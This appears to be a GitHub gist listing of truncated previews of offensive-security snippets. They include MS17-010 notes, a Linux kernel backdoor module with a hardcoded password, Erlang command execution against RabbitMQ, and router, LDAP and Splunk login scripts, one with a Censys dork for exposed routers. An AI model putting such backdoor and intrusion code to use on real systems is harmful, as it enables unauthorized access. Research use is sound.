nixawk
Nice Job From: https://github.com/worawit/MS17-010/blob/master/BUG.txt ``` =============== SMB Transaction =============== To understand the bugs, we need to understand SMB transaction because most bugs in MS17-010 are related to transaction. I try...
``` 01:24 $ ipy Python 3.6.4 (v3.6.4:d48ecebad5, Dec 18 2017, 21:07:28) Type 'copyright', 'credits' or 'license' for more information IPython 6.2.1 -- An enhanced Interactive Python. Type '?' for help....
## add a backdoor driver into kernel-source You can also use other methods (not a driver) to backdoor Linux. ``` ~/Projects/kernelbuild/linux-5.0.3 ➭ zcat /proc/config.gz > .config ~/Projects/kernelbuild/linux-5.0.3 ➭ ll...
## Setup an env lab ``` $ sudo apt-get install rabbitmq-server $ sudo service rabbitmq-server start $ sudo rabbitmqctl -q cluster_status ``` ## Erlang executes os command os:cmd runs command...
``` #include #include #include #include #include MODULE_LICENSE("GPL"); MODULE_AUTHOR("security"); MODULE_DESCRIPTION("Just for educational purpose"); #define KERN_PERMBITS 0666 // permission bits -> /proc/mod/bdm #define KERN_PROCROOT "mod" #define KERN_PROCFILE "bdm" #define KERN_PASSWORD "password" static...
``` #!/usr/bin/python # -*- coding: utf-8 -*- # $ pip install --user python-ldap import ldap import ldapurl import logging import getpass logging.basicConfig(level=logging.INFO) log = logging.getLogger(__file__) def ldap_login(username, password, host, port=389,...
``` #!/usr/bin/python # -*- coding: utf-8 -*- # Keywords : EdgeMax, EdgeOS # Censys dork : "CN=UBNT Router UI" import requests import logging requests.packages.urllib3.disable_warnings( requests.packages.urllib3.exceptions.InsecureRequestWarning ) logging.basicConfig(level=logging.DEBUG) log = logging.getLogger(__file__)...
``` #!/usr/bin/python # -*- coding: utf-8 -*- # pip2 install --user splunk-sdk import splunklib.binding as binding import logging logging.basicConfig(level=logging.INFO) log = logging.getLogger(__file__) def splunk_login(host, port, username, password): """Login Splunk based...
Download: [**Windows Kernel Exploitation.pdf**](https://github.com/nixawk/pentest-wiki/files/1666475/Windows.Kernel.Exploitation.pdf). If you like, please add a reference url for [pentest-wiki](https://github.com/nixawk/pentest-wiki/). ## References - https://github.com/nixawk/Awesome-Windows-Debug/issues/3 - https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
Tested on **ONEPLUS A3010** ``` $ adb shell getprop ro.build.version.release 7.0 $ adb shell pm list packages -f $ adb pull /system/app/EngineeringMode/ EngineeringMode.apk $ cd EngineeringMode.apk $ apktool -d EngineeringMode.apk...